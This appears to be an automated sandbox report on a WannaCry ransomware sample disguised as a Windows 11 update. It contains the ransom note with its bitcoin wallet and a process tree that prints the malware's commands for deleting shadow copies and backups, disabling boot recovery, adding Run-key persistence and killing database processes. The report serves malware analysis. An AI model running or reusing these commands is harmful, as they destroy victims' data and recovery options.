Resubmissions

21-01-2023 19:35

230121-yay6eade64 10

20-01-2023 19:16

230120-xy925shd83 10

Analysis

  • max time kernel
    1800s
  • max time network
    1667s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20221111-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-01-2023 19:16

General

  • Target

    Widows11Update.exe

  • Size

    3.8MB

  • MD5

    9b0091500c0ebfea2c4e2bad322bec57

  • SHA1

    f4eb84034b244a847efb5c0002360a400a0815f0

  • SHA256

    9a32d238e703ab4d481abb14417517a4b7f3ee860729aed21a445aa71ed0094b

  • SHA512

    cabebcdde955669da6488526926069822a192e17832cdac36e14ef6d4437eaad8976744329b78115afc0650f6cb1eb5b354c92aff68b3fbfb6526ff27942c7db

  • SSDEEP

    98304:7uWB26ODixd60A76oBUEmlflIPsnuUpmMUaal4mE4anVIX:7R26ODadZg6fd2ZUpfUaaRE4aVIX

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txt

Family

wannacry

Ransom Note
Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �
Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

  • Wannacry

    WannaCry is a ransomware cryptoworm.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Executes dropped EXE 64 IoCs
  • Modifies extensions of user files 13 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 18 IoCs
  • Loads dropped DLL 7 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Widows11Update.exe
    "C:\Users\Admin\AppData\Local\Temp\Widows11Update.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of SetWindowsHookEx
    PID:3576
    • C:\Users\Admin\AppData\Local\Temp\WindowsUpdate11.exe
      "C:\Users\Admin\AppData\Local\Temp\WindowsUpdate11.exe"
      2⤵
      • Executes dropped EXE
      • Modifies extensions of user files
      • Drops startup file
      • Sets desktop wallpaper using registry
      PID:4820
      • C:\Windows\SysWOW64\attrib.exe
        attrib +h .
        3⤵
        • Views/modifies file attributes
        PID:2952
      • C:\Windows\SysWOW64\icacls.exe
        icacls . /grant Everyone:F /T /C /Q
        3⤵
        • Modifies file permissions
        PID:408
      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
        taskdl.exe
        3⤵
        • Executes dropped EXE
        PID:724
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c 126341674245912.bat
        3⤵
          PID:1284
          • C:\Windows\SysWOW64\cscript.exe
            cscript.exe //nologo m.vbs
            4⤵
              PID:3564
          • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
            taskdl.exe
            3⤵
            • Executes dropped EXE
            PID:368
          • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
            @WanaDecryptor@.exe co
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            PID:4360
            • C:\Users\Admin\AppData\Local\Temp\TaskData\Tor\taskhsvc.exe
              TaskData\Tor\taskhsvc.exe
              4⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • Suspicious behavior: EnumeratesProcesses
              PID:368
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c start /b @WanaDecryptor@.exe vs
            3⤵
              PID:1740
              • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                @WanaDecryptor@.exe vs
                4⤵
                • Executes dropped EXE
                • Suspicious use of SetWindowsHookEx
                PID:3636
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
                  5⤵
                    PID:3432
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      wmic shadowcopy delete
                      6⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2984
              • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                3⤵
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                PID:880
              • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                @WanaDecryptor@.exe
                3⤵
                • Executes dropped EXE
                • Sets desktop wallpaper using registry
                • Suspicious use of SetWindowsHookEx
                PID:4808
              • C:\Windows\SysWOW64\cmd.exe
                cmd.exe /c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kqgaqywjqkrp319" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
                3⤵
                  PID:2784
                  • C:\Windows\SysWOW64\reg.exe
                    reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "kqgaqywjqkrp319" /t REG_SZ /d "\"C:\Users\Admin\AppData\Local\Temp\tasksche.exe\"" /f
                    4⤵
                    • Adds Run key to start application
                    • Modifies registry key
                    PID:4712
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:2444
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4384
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4836
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:4832
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:744
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:3692
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3576
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4596
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:4024
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4244
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2092
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:1476
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4464
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4208
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:3300
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:2204
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3816
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:1700
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:2236
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:880
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:5020
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:1064
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4844
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:4756
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3736
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2228
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:3148
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:2952
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4828
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:1484
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:1704
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:2244
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:4732
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4860
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3376
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:2104
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:2344
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:1692
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:4868
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3932
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3092
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:2120
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4508
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3460
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:3848
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4624
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:1988
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:5072
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:1544
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3476
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:1092
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4464
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  PID:3724
                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  @WanaDecryptor@.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:2292
                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                  taskdl.exe
                  3⤵
                  • Executes dropped EXE
                  PID:4520
                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                  3⤵
                    PID:4368
                  • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                    @WanaDecryptor@.exe
                    3⤵
                    • Suspicious use of SetWindowsHookEx
                    PID:3856
                  • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                    taskdl.exe
                    3⤵
                      PID:2712
                    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                      taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                      3⤵
                        PID:3736
                      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                        @WanaDecryptor@.exe
                        3⤵
                          PID:4712
                        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                          taskdl.exe
                          3⤵
                            PID:3912
                          • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                            taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                            3⤵
                              PID:3040
                            • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                              @WanaDecryptor@.exe
                              3⤵
                                PID:2052
                              • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                taskdl.exe
                                3⤵
                                  PID:1668
                                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                  3⤵
                                    PID:1940
                                  • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                    @WanaDecryptor@.exe
                                    3⤵
                                      PID:1288
                                    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                      taskdl.exe
                                      3⤵
                                        PID:1636
                                      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                        3⤵
                                          PID:3472
                                        • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                          @WanaDecryptor@.exe
                                          3⤵
                                            PID:732
                                          • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                            taskdl.exe
                                            3⤵
                                              PID:3456
                                            • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                              3⤵
                                                PID:484
                                              • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                @WanaDecryptor@.exe
                                                3⤵
                                                  PID:312
                                                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                  taskdl.exe
                                                  3⤵
                                                    PID:3888
                                                  • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                    3⤵
                                                      PID:228
                                                    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                      @WanaDecryptor@.exe
                                                      3⤵
                                                        PID:2784
                                                      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                        taskdl.exe
                                                        3⤵
                                                          PID:3860
                                                        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                          3⤵
                                                            PID:5028
                                                          • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                            @WanaDecryptor@.exe
                                                            3⤵
                                                              PID:1460
                                                            • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                              taskdl.exe
                                                              3⤵
                                                                PID:4036
                                                              • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                3⤵
                                                                  PID:1368
                                                                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                  @WanaDecryptor@.exe
                                                                  3⤵
                                                                    PID:736
                                                                  • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                    taskdl.exe
                                                                    3⤵
                                                                      PID:3152
                                                                    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                      3⤵
                                                                        PID:1472
                                                                      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                        @WanaDecryptor@.exe
                                                                        3⤵
                                                                          PID:3564
                                                                        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                          taskdl.exe
                                                                          3⤵
                                                                            PID:3276
                                                                          • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                            3⤵
                                                                              PID:3484
                                                                            • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                              @WanaDecryptor@.exe
                                                                              3⤵
                                                                                PID:3696
                                                                              • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                taskdl.exe
                                                                                3⤵
                                                                                  PID:4172
                                                                                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                  3⤵
                                                                                    PID:4624
                                                                                  • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                    @WanaDecryptor@.exe
                                                                                    3⤵
                                                                                      PID:440
                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                      taskdl.exe
                                                                                      3⤵
                                                                                        PID:744
                                                                                      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                        3⤵
                                                                                          PID:4488
                                                                                        • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                          @WanaDecryptor@.exe
                                                                                          3⤵
                                                                                            PID:3536
                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                            taskdl.exe
                                                                                            3⤵
                                                                                              PID:444
                                                                                            • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                              3⤵
                                                                                                PID:3116
                                                                                              • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                @WanaDecryptor@.exe
                                                                                                3⤵
                                                                                                  PID:4784
                                                                                                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                  taskdl.exe
                                                                                                  3⤵
                                                                                                    PID:4660
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                    taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                    3⤵
                                                                                                      PID:532
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                      @WanaDecryptor@.exe
                                                                                                      3⤵
                                                                                                        PID:4720
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                        taskdl.exe
                                                                                                        3⤵
                                                                                                          PID:2216
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                          taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                          3⤵
                                                                                                            PID:408
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                            @WanaDecryptor@.exe
                                                                                                            3⤵
                                                                                                              PID:372
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                              taskdl.exe
                                                                                                              3⤵
                                                                                                                PID:628
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                3⤵
                                                                                                                  PID:4952
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                  @WanaDecryptor@.exe
                                                                                                                  3⤵
                                                                                                                    PID:4376
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                    taskdl.exe
                                                                                                                    3⤵
                                                                                                                      PID:2292
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                      taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                      3⤵
                                                                                                                        PID:716
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                        @WanaDecryptor@.exe
                                                                                                                        3⤵
                                                                                                                          PID:2288
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                          taskdl.exe
                                                                                                                          3⤵
                                                                                                                            PID:3856
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                            taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                            3⤵
                                                                                                                              PID:4796
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                              @WanaDecryptor@.exe
                                                                                                                              3⤵
                                                                                                                                PID:2080
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                taskdl.exe
                                                                                                                                3⤵
                                                                                                                                  PID:4288
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                  taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                  3⤵
                                                                                                                                    PID:4208
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                    @WanaDecryptor@.exe
                                                                                                                                    3⤵
                                                                                                                                      PID:5076
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                      taskdl.exe
                                                                                                                                      3⤵
                                                                                                                                        PID:676
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill.exe /f /im Microsoft.Exchange.*
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:4628
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill.exe /f /im MSExchange*
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:3948
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill.exe /f /im sqlserver.exe
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:4804
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill.exe /f /im mysqld.exe
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:1268
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill.exe /f /im sqlwriter.exe
                                                                                                                                        3⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:3540
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                        taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                        3⤵
                                                                                                                                          PID:4432
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                          @WanaDecryptor@.exe
                                                                                                                                          3⤵
                                                                                                                                            PID:4372
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                            taskdl.exe
                                                                                                                                            3⤵
                                                                                                                                              PID:3740
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\taskse.exe
                                                                                                                                              taskse.exe C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                              3⤵
                                                                                                                                                PID:1184
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                @WanaDecryptor@.exe
                                                                                                                                                3⤵
                                                                                                                                                  PID:180
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\taskdl.exe
                                                                                                                                                  taskdl.exe
                                                                                                                                                  3⤵
                                                                                                                                                    PID:3352
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe
                                                                                                                                                    @WanaDecryptor@.exe
                                                                                                                                                    3⤵
                                                                                                                                                      PID:3152
